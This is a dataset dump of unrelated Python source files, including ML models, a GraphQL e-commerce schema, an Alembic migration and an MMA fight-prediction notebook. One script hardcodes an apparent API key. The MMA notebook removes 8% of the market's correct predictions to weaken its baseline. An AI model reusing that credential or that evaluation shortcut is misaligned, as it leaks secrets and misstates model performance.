use_scm_version=USE_SCM_VERSION,\n)\n","repo_name":"lemieuxbenedicte/xESMF","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"18342172732","text":"from collections import deque\nimport random\nimport torch\nimport torch.nn as nn\n\n\nclass ResNetBlock(nn.Module):\n \n def __init__(self, in_channels, out_channels):\n super().__init__()\n self.net = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1, stride=1),\n nn.ReLU(),\n nn.BatchNorm2d(out_channels),\n nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1, stride=1),\n nn.ReLU(),\n nn.BatchNorm2d(out_channels), \n )\n self.residual = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1, stride=1)\n \n def forward(self, x):\n \n identity = self.residual(x)\n x2 = self.net(x)\n return identity + x2\n \nclass ResNetSnake(nn.Module):\n \n def __init__(self):\n super().__init__()\n \n self.net1 = ResNetBlock(1, 32)\n self.net2 = ResNetBlock(32, 64)\n self.net3 = ResNetBlock(64, 128)\n self.net4 = ResNetBlock(128, 256)\n self.maxpool = nn.MaxPool2d(2)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Sequential(\n nn.Linear(260, 64), # 256 + 4: additional 4 is direction data\n nn.ReLU(),\n nn.Linear(64, 4) # 4: Number of actions\n )\n \n def forward(self, boards, directions):\n \n x = self.net1(boards)\n x = self.maxpool(x)\n x = self.net2(x)\n x = self.maxpool(x)\n x = self.net3(x)\n x = self.maxpool(x)\n x = self.net4(x)\n x = self.avgpool(x)\n x = torch.flatten(x, start_dim=1)\n x = torch.cat([x, directions], dim=1)\n \n return self.fc(x)\n\nclass SimpleFCSnake(nn.Module):\n \n def __init__(self):\n super().__init__()\n self.net = nn.Sequential(\n nn.Linear(28*28 + 4, 128),\n nn.ReLU(),\n nn.BatchNorm1d(128),\n nn.Linear(128, 64),\n nn.ReLU(),\n nn.BatchNorm1d(64),\n nn.Linear(64, 4)\n )\n \n def forward(self, boards, directions):\n \n board_flat = torch.flatten(boards, start_dim=1)\n x = torch.cat([board_flat, directions], dim=1)\n return self.net(x)\n \nclass SnakeAI():\n def __init__(self, device, model_class=ResNetSnake):\n self.device = device\n self.policy_net = model_class().to(device)\n self.target_net = model_class().to(device)\n self.target_net.load_state_dict(self.policy_net.state_dict())\n self.step = 0\n self.gamma = 0.95\n \n def get_Q(self, state, next_state):\n \n state_board, state_dir = state\n nstate_board, nstate_dir = next_state\n Q_curr = self.policy_net(state_board.to(self.device), state_dir.to(self.device))\n Q_next = self.target_net(nstate_board.to(self.device), nstate_dir.to(self.device))\n return Q_curr, Q_next\n\n def update_target_net(self):\n if self.step % 10 == 0:\n self.target_net.load_state_dict(self.policy_net.state_dict())\n \n def update_step(self):\n self.step += 1\n \n def save_policy_net(self, save_path):\n torch.save(self.policy_net.state_dict(), save_path)\n \n def load_policy_net(self, load_path):\n self.policy_net.load_state_dict(torch.load(load_path, map_location = self.device))\n \n def get_action(self, state, epsilon):\n \"\"\"\n Epsilon greedy action choice\n \n epsilon: float between 0 and 1, dictates how adventurous we should be.\n \"\"\"\n state_board, state_dir = state\n state_board = state_board.unsqueeze(0)\n state_dir = state_dir.unsqueeze(0)\n self.policy_net.eval()\n with torch.no_grad(): \n Q_curr = self.policy_net(state_board.to(self.device), state_dir.to(self.device))\n \n self.policy_net.train()\n random_value = torch.rand(1)\n return torch.randint(0, state_dir.shape[1], (1,)) if random_value < epsilon else Q_curr.argmax()\n \n \nclass ExperienceBuffer():\n \n def __init__(self, buffer_size):\n self.buffer = []\n self.buffer_size = buffer_size\n \n def collect(self, experience):\n self.buffer.append(experience)\n if len(self.buffer) > self.buffer_size:\n self.buffer.pop(0)\n \n def sample_from_experience(self, sample_size):\n if len(self.buffer) < sample_size:\n sample_size = len(self.buffer)\n \n sample = random.sample(self.buffer, sample_size)\n state_boards = torch.stack([exp[0][0] for exp in sample])\n # A one-hot vector denoting direction.\n state_dir = torch.stack([exp[0][1] for exp in sample])\n action = torch.FloatTensor([exp[1] for exp in sample])\n reward = torch.FloatTensor([exp[2] for exp in sample])\n nstate_boards = torch.stack([exp[3][0] for exp in sample])\n nstate_dir = torch.stack([exp[3][1] for exp in sample])\n\n return (state_boards, state_dir), action, reward, (nstate_boards, nstate_dir)\n\n\n\n ","repo_name":"SamuelVedrik/SnakeAIV2","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9804467696","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\n查询手机归属地,GET请求,JSON格式数据\nhttp://a.apix.cn/apixlife/phone/phone?phone=value\n'''\n\nimport requests\n\n# 接口地址\nurl = \"http://a.apix.cn/apixlife/phone/phone\"\n\n# 参数,手机号\nquerystring = {\"phone\": \"182xxxxxxx\"}\n\nheaders = {\n 'accept': \"application/json\",\n 'content-type': \"application/json\",\n 'apix-key': \"05928e129da74151614259915a63e5d6\" # 登录的apix-key\n }\n\nresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n\nprint(response.text)\n\n","repo_name":"fountainhead-gq/ArticleCatalog","sub_path":"PythonCoder/017_SearchMoblieHome.py","file_name":"017_SearchMoblieHome.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"71349382577","text":"\"\"\"create perf review\n\nRevision ID: 768fa5f35eaa\nRevises: 951bf251b2b3\nCreate Date: 2022-08-07 17:40:42.059608\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom sqlalchemy.dialects import postgresql\n\nfrom api.db.models import PerformanceReviewQualityType\n\n\n# revision identifiers, used by Alembic.\nrevision = '768fa5f35eaa'\ndown_revision = '951bf251b2b3'\nbranch_labels = None\ndepends_on = None\n\nREVIEW_QUALITY_TYPE_ENUM = postgresql.ENUM(\n PerformanceReviewQualityType,\n name=\"performance_review_quality_type\"\n)\n\n\ndef upgrade() -> None:\n op.create_table(\n \"performance_review\",\n sa.Column(\"id\", sa.String(20), primary_key=True),\n sa.Column(\"overall\", REVIEW_QUALITY_TYPE_ENUM),\n sa.Column(\"non_negotiables\", sa.SmallInteger),\n sa.Column(\"student_work_quality\", sa.SmallInteger),\n sa.Column(\"commentary\", sa.Text),\n sa.Column(\"created_at\", sa.DateTime, server_default=sa.func.current_timestamp()),\n sa.Column(\"teacher_id\", sa.String(20), sa.ForeignKey(\"teacher.id\")),\n sa.Column(\"assesser_id\", sa.String(20), sa.ForeignKey(\"teacher.id\"))\n )\n\n op.create_check_constraint(\n \"ck_performance_student_work_quality_less_than_or_equal_to_ten\",\n \"performance_review\",\n sa.column(\"student_work_quality\") <= 10\n )\n\n\ndef downgrade() -> None:\n op.drop_constraint(\"ck_performance_student_work_quality_less_than_or_equal_to_ten\", \"performance_review\")\n op.drop_table(\"performance_review\")\n\n REVIEW_QUALITY_TYPE_ENUM.drop(op.get_bind(), checkfirst=True)\n","repo_name":"getaddrinfo/tlda","sub_path":"api/migration/versions/768fa5f35eaa_create_perf_review.py","file_name":"768fa5f35eaa_create_perf_review.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"30104923980","text":"import collections\n\n\ndef main():\n n = int(input())\n B = [collections.deque() for _ in range(n)]\n\n Blis = []\n\n ans = 0\n\n for i in range(n):\n a, b = map(int, input().split())\n\n B[a - 1].append(b)\n for j in range(n):\n Blis += B[j]\n if len(Blis) == 0:\n print(ans)\n continue\n ans += max(Blis)\n Blis.remove(max(Blis))\n print(ans)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"taichi6930/atcoder","sub_path":"_archive/past202004_f.py","file_name":"past202004_f.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"11808071149","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 31 11:45:15 2022\n\n@author: HAMZA\n\"\"\"\n\n\n\nimport numpy as np \nimport pandas as pd \nimport matplotlib.pyplot as plt\n\nimport warnings\n\nwarnings.filterwarnings('ignore')\n#%%\n# load data set\nx_l = np.load('X.npy')\nY_l = np.load('Y.npy')\nimg_size = 64\n\nplt.subplot(1, 2, 1)\nplt.imshow(x_l[260].reshape(img_size, img_size))\nplt.axis('off')\nplt.subplot(1, 2, 2)\nplt.imshow(x_l[900].reshape(img_size, img_size))\nplt.axis('off')\n\n\n\n\n\n\n\n#%%\n#'Also sign one is between indexes 822 and 1027. Number of one sign is 206. Therefore, we will use 205 samples from each classes(labels).\n\n\nX = np.concatenate((x_l[204:409], x_l[822:1027] ), axis=0) # from 0 to 204 is zero sign and from 205 to 410 is one sign \nz = np.zeros(205)\no = np.ones(205)\nY = np.concatenate((z, o), axis=0).reshape(X.shape[0],1)\nprint(\"X shape: \" , X.shape)\nprint(\"Y shape: \" , Y.shape)\n\n# Then lets create x_train, y_train, x_test, y_test arrays\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.15, random_state=42)\nnumber_of_train = X_train.shape[0]\nnumber_of_test = X_test.shape[0]\n\n#%%Now we have 3 dimensional input array (X) so we need to make it flatten (2D) in order to use as input for our first deep learning model.\n\nX_train_flatten = X_train.reshape(number_of_train,X_train.shape[1]*X_train.shape[2])\nX_test_flatten = X_test .reshape(number_of_test,X_test.shape[1]*X_test.shape[2])\nprint(\"X train flatten\",X_train_flatten.shape)\nprint(\"X test flatten\",X_test_flatten.shape)\n\n\n\nx_train = X_train_flatten.T\nx_test = X_test_flatten.T\ny_train = Y_train.T\ny_test = Y_test.T\nprint(\"x train: \",x_train.shape)\nprint(\"x test: \",x_test.shape)\nprint(\"y train: \",y_train.shape)\nprint(\"y test: \",y_test.shape)\n\n\n#%%\n\n#%%\n\n#%%\n\n#%%\n\n#%%\n\n#%%\n\n#%%\n\n\n\n\n\n\n\n\n\n","repo_name":"hamzamaral/deep-learning","sub_path":"logistic-regression.py","file_name":"logistic-regression.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"25733646948","text":"import graphene\nfrom .models import User, ImageUpload, UserProfile, UserAddress\nfrom graphene_django import DjangoObjectType\nfrom django.contrib.auth import authenticate\nfrom datetime import datetime\nfrom ecommerce_api.authentication import TokenManager\nfrom ecommerce_api.permissions import is_authenticated, paginate\nfrom graphene_file_upload.scalars import Upload\nfrom django.conf import settings\n\n\nclass UserType(DjangoObjectType):\n\n class Meta:\n model = User\n\n\nclass ImageUploadType(DjangoObjectType):\n image = graphene.String()\n\n class Meta:\n model = ImageUpload\n\n def resolve_image(self, info):\n if self.image:\n return \"{}{}{}\".format(settings.S3_BUCKET_URL, settings.MEDIA_URL, self.image)\n return None\n\n\nclass UserProfileType(DjangoObjectType):\n\n class Meta:\n model = UserProfile\n\n\nclass UserAddressType(DjangoObjectType):\n\n class Meta:\n model = UserAddress\n\n\nclass RegisterUser(graphene.Mutation):\n status = graphene.Boolean()\n message = graphene.String()\n\n class Arguments:\n email = graphene.String(required=True)\n password = graphene.String(required=True)\n first_name = graphene.String(required=True)\n last_name = graphene.String(required=True)\n\n def mutate(self, info, email, password, **kwargs):\n User.objects.create_user(email, password, **kwargs)\n\n return RegisterUser(\n status=True,\n message=\"User created successfully\"\n )\n\n\nclass LoginUser(graphene.Mutation):\n access = graphene.String()\n refresh = graphene.String()\n user = graphene.Field(UserType)\n\n class Arguments:\n email = graphene.String(required=True)\n password = graphene.String(required=True)\n\n def mutate(self, info, email, password):\n user = authenticate(username=email, password=password)\n\n if not user:\n raise Exception(\"invalid credentials\")\n\n user.last_login = datetime.now()\n user.save()\n\n access = TokenManager.get_access({\"user_id\": user.id})\n refresh = TokenManager.get_refresh({\"user_id\": user.id})\n\n return LoginUser(\n access=access,\n refresh=refresh,\n user=user\n )\n\n\nclass GetAccess(graphene.Mutation):\n access = graphene.String()\n\n class Arguments:\n refresh = graphene.String(required=True)\n\n def mutate(self, info, refresh):\n token = TokenManager.decode_token(refresh)\n\n if not token or token[\"type\"] != \"refresh\":\n raise Exception(\"Invalid token or has expired\")\n\n access = TokenManager.get_access({\"user_id\": token[\"user_id\"]})\n\n return GetAccess(\n access=access\n )\n\n\nclass ImageUploadMain(graphene.Mutation):\n image = graphene.Field(ImageUploadType)\n\n class Arguments:\n image = Upload(required=True)\n\n def mutate(self, info, image):\n image = ImageUpload.objects.create(image=image)\n\n return ImageUploadMain(\n image=image\n )\n\n\nclass UserProfileInput(graphene.InputObjectType):\n profile_picture = graphene.String()\n country_code = graphene.String()\n\n\nclass CreateUserProfile(graphene.Mutation):\n user_profile = graphene.Field(UserProfileType)\n\n class Arguments:\n profile_data = UserProfileInput()\n dob = graphene.Date(required=True)\n phone = graphene.Int(required=True)\n\n @is_authenticated\n def mutate(self, info, profile_data, **kwargs):\n user_profile = UserProfile.objects.create(\n user_id = info.context.user.id,\n **profile_data, **kwargs\n )\n\n return CreateUserProfile(\n user_profile=user_profile\n )\n\n\nclass UpdateUserProfile(graphene.Mutation):\n user_profile = graphene.Field(UserProfileType)\n\n class Arguments:\n profile_data = UserProfileInput()\n dob = graphene.Date()\n phone = graphene.Int()\n\n @is_authenticated\n def mutate(self, info, profile_data, **kwargs):\n try:\n info.context.user.user_profile\n except Exception:\n raise Exception(\"You don't have a profile to update\")\n\n UserProfile.objects.filter(user_id=info.context.user.id).update(**profile_data, **kwargs)\n\n return UpdateUserProfile(\n user_profile = info.context.user.user_profile\n )\n\n\nclass AddressInput(graphene.InputObjectType):\n street = graphene.String()\n city = graphene.String()\n state = graphene.String()\n country = graphene.String()\n\n\nclass CreateUserAddress(graphene.Mutation):\n address = graphene.Field(UserAddressType)\n\n class Arguments:\n address_data = AddressInput(required=True)\n is_default = graphene.Boolean()\n\n @is_authenticated\n def mutate(self, info, address_data, is_default=False):\n try:\n user_profile_id = info.context.user.user_profile.id\n except Exception:\n raise Exception(\"You need a profile to create an address\")\n\n existing_addresses = UserAddress.objects.filter(user_profile_id=user_profile_id)\n\n if is_default:\n existing_addresses.update(is_default=False)\n\n address = UserAddress.objects.create(\n user_profile_id=user_profile_id,\n is_default=is_default,\n **address_data\n )\n\n return CreateUserAddress(\n address=address\n )\n\n \nclass UpdateUserAddress(graphene.Mutation):\n address = graphene.Field(UserAddressType)\n\n class Arguments:\n address_data = AddressInput()\n is_default = graphene.Boolean()\n address_id = graphene.ID(required=True)\n\n @is_authenticated\n def mutate(self, info, address_data, address_id, is_default=False):\n profile_id = info.context.user.user_profile.id\n\n UserAddress.objects.filter(\n user_profile_id = profile_id,\n id=address_id\n ).update(is_default=is_default, **address_data)\n\n if is_default:\n UserAddress.objects.filter(\n user_profile_id=profile_id).exclude(id=address_id).update(is_default=False)\n\n return UpdateUserAddress(\n address = UserAddress.objects.get(id=address_id)\n )\n\n\nclass DeleteUserAddress(graphene.Mutation):\n status = graphene.Boolean()\n\n class Arguments:\n address_id = graphene.ID(required=True)\n\n @is_authenticated\n def mutate(self, info, address_id):\n UserAddress.objects.filter(\n user_profile_id = profile_id,\n id=address_id\n ).delete()\n\n return DeleteUserAddress(\n status=True\n )\n\n\nclass Query(graphene.ObjectType):\n users = graphene.Field(paginate(UserType), page=graphene.Int())\n image_uploads = graphene.Field(paginate(ImageUploadType), page=graphene.Int())\n me = graphene.Field(UserType)\n\n def resolve_users(self, info, **kwargs):\n return User.objects.filter(**kwargs)\n\n def resolve_image_uploads(self, info, **kwargs):\n return ImageUpload.objects.filter(**kwargs)\n\n @is_authenticated\n def resolve_me(self, info):\n return info.context.user\n\n\nclass Mutation(graphene.ObjectType):\n register_user = RegisterUser.Field()\n login_user = LoginUser.Field()\n get_access = GetAccess.Field()\n image_upload = ImageUploadMain.Field()\n create_user_profile = CreateUserProfile.Field()\n update_user_profile = UpdateUserProfile.Field()\n create_user_address = CreateUserAddress.Field()\n update_user_address = UpdateUserAddress.Field()\n delete_user_address = DeleteUserAddress.Field()\n\n\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"adefemi/ecommerce-api","sub_path":"user_controller/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":7628,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"57"} +{"seq_id":"31814246823","text":"from typing import List\n\n\nclass Solution1:\n def make_square(self, matchsticks: List[int]) -> bool:\n def dfs(targets, idx):\n if idx == len(matchsticks):\n return True\n for i in range(4):\n if matchsticks[idx] <= targets[i]:\n targets[i] -= matchsticks[idx]\n if dfs(targets, idx+1):\n return True\n targets[i] += matchsticks[idx]\n return False\n\n stick_sum = sum(matchsticks)\n if stick_sum % 4:\n return False\n targets = [stick_sum // 4] * 4\n matchsticks.sort(reverse=True)\n return dfs(targets, 0)\n","repo_name":"YuhanShi53/Leetcode_Solutions","sub_path":"solutions/Leetcode_473/leetcode_473.py","file_name":"leetcode_473.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"5111606672","text":"import bisect\nfrom datetime import datetime\n\nfrom domain import Flight\n\nimport logger_instance\nfrom const import time_format, NUMBER_OF_SUCCESS_FLIGHTS_ALLOWED\n\n\ndef sort_flights_by_arrival(flights: list[Flight]):\n sorted_flights = sorted(flights, key=lambda f: f.arrival.strftime(time_format))\n return sorted_flights\n\n\ndef flight_duration_min(flight: Flight):\n arrival_dt = datetime.combine(datetime.min, flight.arrival)\n departure_dt = datetime.combine(datetime.min, flight.departure)\n\n diff_seconds = (departure_dt - arrival_dt).total_seconds()\n diff_minutes = diff_seconds / 60\n\n return diff_minutes\n\n\ndef remove_outdated_flights(exists_flights, flights_to_update):\n for flight in flights_to_update:\n exists_flights.remove(flight)\n\n\nclass SuccessFlightService:\n def __init__(self):\n self._successful_flights: list[Flight] = []\n\n def calculate_success_flights(self, flights: list[Flight]):\n logger_instance.logger.debug(\"calculating success flights...\")\n flights_to_update = []\n sorted_flights = sort_flights_by_arrival(flights)\n sorted_arrival_times = [flight.arrival for flight in self._successful_flights]\n\n for flight in sorted_flights:\n if flight_duration_min(flight) >= 180:\n\n if len(self._successful_flights) < NUMBER_OF_SUCCESS_FLIGHTS_ALLOWED:\n flight.success = 'success'\n self._successful_flights.append(flight)\n sorted_arrival_times = [flight.arrival for flight in self._successful_flights]\n else:\n expected_index_in_successful_flights = bisect.bisect_left(sorted_arrival_times, flight.arrival)\n\n if expected_index_in_successful_flights <= NUMBER_OF_SUCCESS_FLIGHTS_ALLOWED - 1:\n extracted_flight = self._successful_flights.pop()\n extracted_flight.success = 'fail'\n flights_to_update.append(extracted_flight)\n\n # keep the successful flight in the list with the size of NUMBER_OF_SUCCESS_FLIGHTS_ALLOWED\n self._successful_flights = self._successful_flights[:expected_index_in_successful_flights] + [\n flight] + self._successful_flights[expected_index_in_successful_flights:]\n\n flight.success = 'success'\n\n sorted_arrival_times = [flight.arrival for flight in self._successful_flights]\n else:\n flight.success = 'fail'\n else:\n flight.success = 'fail'\n logger_instance.logger.debug(\"calculated success flights done !\")\n return sorted_flights, flights_to_update\n","repo_name":"TomerArzu/success_flight","sub_path":"application/services/success_flight_service.py","file_name":"success_flight_service.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18284474803","text":"# ---\n# jupyter:\n# jupytext:\n# notebook_metadata_filter: ploomber\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.13.6\n# kernelspec:\n# display_name: Python 3 (ipykernel)\n# language: python\n# name: python3\n# ploomber:\n# injected_manually: true\n# ---\n\n# %% tags=[\"parameters\"]\n\nupstream = None\nproduct = None\ntarget = None\nrandom_seed = None\nvalidation_ratio = None\nodds_cols = None\n\n# %% tags=[\"injected-parameters\"]\n# Parameters\ntarget = [\"WINNER\"]\nodds_cols = [\"R_ODDS\", \"B_ODDS\"]\nrandom_seed = 1\ntest_ratio = 0.2\ninner_splits = 2\nouter_splits = 5\nupstream = {\n \"features\": {\n \"data\": \"/home/m/repo/mma/products/data/features.csv\",\n \"nb\": \"/home/m/repo/mma/products/reports/features.ipynb\",\n }\n}\nproduct = {\n \"nb\": \"/home/m/repo/mma/products/reports/nested_cv.ipynb\",\n \"model\": \"/home/m/repo/mma/products/models/nested_cv.pt\",\n}\n# %%\nimport os\nimport pickle\n\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\nimport sklearn\nfrom autosklearn.pipeline.components.data_preprocessing.balancing.balancing import Balancing\nfrom mlxtend.evaluate import accuracy_score\nfrom mlxtend.evaluate import confusion_matrix\nfrom mlxtend.plotting import plot_confusion_matrix\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import make_scorer, balanced_accuracy_score, log_loss\nimport random\nrandom.seed(random_seed)\n\n# %%\ncurrent_dir = os.path.abspath('')\nfig_dir = os.path.join(current_dir, '../fig')\nprint(\"fig_dir=\" + fig_dir)\n# %%\ndf = pd.read_csv(upstream['features']['data'])\nmarket = df[odds_cols]\nodds = market[['R_ODDS', 'B_ODDS']].values\nmarket_probs = sklearn.preprocessing.normalize(1 / odds, norm=\"l1\")\nmarket['p_red'] = market_probs[:,0]\nmarket['p_blue'] = market_probs[:,1]\nmarket['y_mkt'] = (market.p_red >= market.p_blue).astype(int)\ny = df[target]\nmarket['y_gt'] = y\n\n# D(P||Q) KL divergence, relative entropy of P, Q\ndef st_kl(R, Q):\n return (R[R>0] * np.log(R[R>0] / Q[R>0])).sum()\n\ndef st_kl_score(y_true, y_prob):\n # leave out zeros in y.\n kl_mean = st_kl(y_true, y_prob) / len(y_true[y_true == 1])\n return kl_mean\n\nst_kl_scorer = make_scorer(st_kl_score, needs_proba=True)\nlog_loss_scorer = make_scorer(log_loss, needs_proba=True)\n\n\nX_fund = df.drop(columns = target)\nif odds_cols in df.columns.tolist():\n X_fund = X_fund.drop(columns=odds_cols)\n\nif any(item in df.columns.tolist() for item in odds_cols):\n X_fund = X_fund.drop(columns=odds_cols)\n\n# X_fund['R_ODDS'] = market['R_ODDS']\n# X_fund['B_ODDS'] = market['B_ODDS']\n\nprint(X_fund.columns)\n\nprint(X_fund.head())\nprint(y.head())\n\nX = X_fund.values\ny = y.values.ravel()\n\n# %%\n# Market fix\nmkt_correct_idx = market[(market.y_mkt == market.y_gt)].index.to_list()\nremove = random.sample(mkt_correct_idx, int(len(mkt_correct_idx) * 0.08))\nmkt = market.drop(remove).reset_index(drop = True)\n\n# %%\n\nmarket_acc = []\nmarket_bacc = []\nmarket_kl = []\nmarket_cv = StratifiedKFold(n_splits=outer_splits, shuffle=True, random_state=1)\nfor train_index, test_index in market_cv.split(mkt.values, mkt.y_gt):\n fold = mkt.iloc[test_index, :]\n fold_acc = accuracy_score(fold.y_gt, fold.y_mkt)\n fold_bacc = balanced_accuracy_score(fold.y_gt, fold.y_mkt)\n\n y_true = fold.y_gt.values\n # p_market = fold[['p_red', 'p_blue']].values\n\n fold_kl = st_kl_score(y_true, fold['p_red'].values)\n market_acc.append(fold_acc)\n market_bacc.append(fold_bacc)\n market_kl.append(fold_kl)\n\n\nmarket_acc = np.array(market_acc)\nmarket_bacc = np.array(market_bacc)\nmarket_kl = np.array(market_kl)\n\nprint('\\n%s | outer ACC %.2f%% +/- %.2f' %\n (\"market\", market_acc.mean() * 100,\n market_acc.std() * 100))\n\nprint('\\n%s | outer B-ACC %.2f%% +/- %.2f' %\n (\"market\", market_bacc.mean() * 100,\n market_bacc.std() * 100))\n\nprint('\\n%s | outer KL %.2f +/- %.2f \\n' %\n (\"market\", market_kl.mean(),\n market_kl.std()))\n\n# prior\nprint(\"ground truth r_win, blue_win\")\ny_true = mkt.y_gt.values\nred_prior = y_true.sum() / len(y_true)\nblue_prior = 1 - red_prior\nprint(f\"GT red:{red_prior} blue:{blue_prior}\")\n\n# prior\nprint(\"market r_win, blue_win\")\ny_mkt = mkt.y_mkt.values\nred_prior_mkt = y_mkt.sum() / len(y_mkt)\nblue_prior_mkt = 1 - red_prior_mkt\nprint(f\"mkt red:{red_prior_mkt} blue:{blue_prior_mkt}\")\n\nconfmat = confusion_matrix(mkt.y_gt, mkt.y_mkt)\nfig, ax = plot_confusion_matrix(conf_mat=confmat,\n show_absolute=False,\n show_normed=True,\n # class_names = [1,0],\n figsize=(4, 4))\n\nfig.tight_layout()\nfig.savefig(fig_dir + '/confmat_bin.eps', bbox_inches='tight', pad_inches=0)\nplt.show()\n\n# %%\nX = X.astype(np.float32)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y,\n test_size=test_ratio,\n random_state=random_seed,\n stratify=y)\n\n# Initializing Classifiers\nclf1 = LogisticRegression(multi_class='multinomial',\n solver='newton-cg',\n random_state=1)\nclf2 = KNeighborsClassifier(algorithm='ball_tree',\n leaf_size=50)\nclf3 = DecisionTreeClassifier(random_state=1)\nclf4 = SVC(random_state=1)\nclf5 = RandomForestClassifier(random_state=1)\nclf6 = ExtraTreesClassifier(random_state=1)\n\nclf8 = MLPClassifier(max_iter=10000,random_state=1)\n\nclf9 = GradientBoostingClassifier(random_state=1)\n\n# Building the pipelines\npipe1 = Pipeline([('std', StandardScaler()),\n ('clf1', clf1)])\n\npipe2 = Pipeline([('std', StandardScaler()),\n ('clf2', clf2)])\n\npipe3 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('clf3', clf3)])\n\npipe4 = Pipeline([('std', StandardScaler()),\n ('clf4', clf4)])\n\npipe5 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('clf5', clf5)])\n\npipe6 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('clf6', clf6)])\n\npipe8 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('std', StandardScaler()),\n ('clf8', clf8)])\n\npipe9 = Pipeline([('balancing', Balancing(random_state=1, strategy='weighting')),\n ('clf9', clf9)])\n\n# Setting up the parameter grids\ngrid1 = [{'clf1__penalty': ['l2', 'l1'],\n 'clf1__C': np.power(10., np.arange(-4, 4))}]\n\ngrid2 = [{'clf2__n_neighbors': list(range(1, 100)),\n 'clf2__p': [1, 2, 3, 4, 5]}]\n\ngrid3 = [{'clf3__max_depth': list(range(1, 50)) + [None],\n 'clf3__criterion': ['gini', 'entropy']}]\n\ngrid4 = [{'clf4__kernel': ['rbf', 'poly'],\n 'clf4__C': np.power(10., np.arange(-4, 4)),\n 'clf4__gamma': np.power(10., np.arange(-5, 0))}\n ]\n\ngrid5 = [{'clf5__n_estimators': [100, 500, 1000, 5000]}]\n\n\ngrid6 = [{'clf6__n_estimators': [500, 1000],\n 'clf6__criterion': ['gini', 'entropy'],\n # 'clf6__min_samples_leaf': param_range,\n # 'clf6__max_depth': param_range,\n # 'clf6__min_samples_split': param_range[1:]\n }]\n\n# grid8 = [{\n# 'clf8__hidden_layer_sizes': [(30,), (68,), (100,), (1000,), (200,), (100, 50), (100, 100),(1000, 2), (1000, 10), (50,100,50)],\n# 'clf8__activation': ['tanh', 'relu'],\n# 'clf8__solver': ['sgd', 'adam'],\n# 'clf8__alpha': [0.0001, 0.05, 0.00047],\n# 'clf8__batch_size': ['auto'],\n# 'clf8__early_stopping': [True],\n# 'clf8__learning_rate': ['adaptive'],\n# }]\n\ngrid8 = [{\n 'clf8__hidden_layer_sizes': [(256,), (500,), (1000,), (500,2)],\n 'clf8__activation': ['tanh', 'relu'],\n 'clf8__solver': ['sgd', 'adam'],\n 'clf8__alpha': [0.0001, 0.05, 0.00047],\n 'clf8__batch_size': ['auto'],\n 'clf8__early_stopping': [True],\n 'clf8__learning_rate': ['adaptive'],\n }]\n\ngrid9 = [{\n \"clf9__loss\":[\"deviance\"],\n \"clf9__learning_rate\": [0.01, 0.025, 0.05, 0.075, 0.1, 0.15, 0.2],\n \"clf9__min_samples_split\": np.linspace(0.1, 0.5, 12),\n \"clf9__min_samples_leaf\": np.linspace(0.1, 0.5, 12),\n \"clf9__max_depth\":[3,5,8],\n \"clf9__max_features\":[\"log2\",\"sqrt\"],\n \"clf9__criterion\": [\"friedman_mse\", \"mse\"],\n \"clf9__subsample\":[0.5, 0.618, 0.8, 0.85, 0.9, 0.95, 1.0],\n \"clf9__n_estimators\":[10]\n }]\n\n# %%ssh -o 'PubkeyAuthentication=no' 'uhrinmat@147.32.83.226'\n\n# Setting up multiple GridSearchCV objects, 1 for each algorithm\ngridcvs = {}\ninner_cv = StratifiedKFold(n_splits=inner_splits, shuffle=True, random_state=1)\n\n# gcv = GridSearchCV(estimator=pipe8,\n# param_grid=param_grid8,\n# scoring='accuracy',\n# n_jobs=-1,\n# cv=inner_cv,\n# verbose=0,\n# refit=True)\n# gridcvs['MLP_STD'] 